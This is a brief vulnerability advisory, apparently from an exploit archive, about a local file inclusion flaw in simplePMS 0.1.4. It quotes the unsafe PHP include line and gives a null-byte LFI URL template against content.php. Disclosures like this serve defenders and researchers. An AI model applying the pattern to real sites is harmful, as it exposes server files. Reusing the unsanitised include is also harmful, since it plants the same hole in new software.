id: 10856
date: 02/12/2010
title: simplePMS <= 0.1.4 Local File Include Vulnerability
author: cr4wl3r
cves: 

===================================================
simplePMS <= 0.1.4 Local File Include Vulnerability
===================================================

##################################################################
[+] simplePMS <= 0.1.4 Local File Include Vulnerability
[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org>
[+] Download : http://sourceforge.net/projects/simplepms/files/
##################################################################

[+] Code :

##################################################################
[content.php]

<?php include("../posts/$filename-posts.php"); ?>
##################################################################

[+] Example :


   [simplePMS_path]/include/content.php?filename=[LFI%00]




#  0day.today [2023-03-23]  #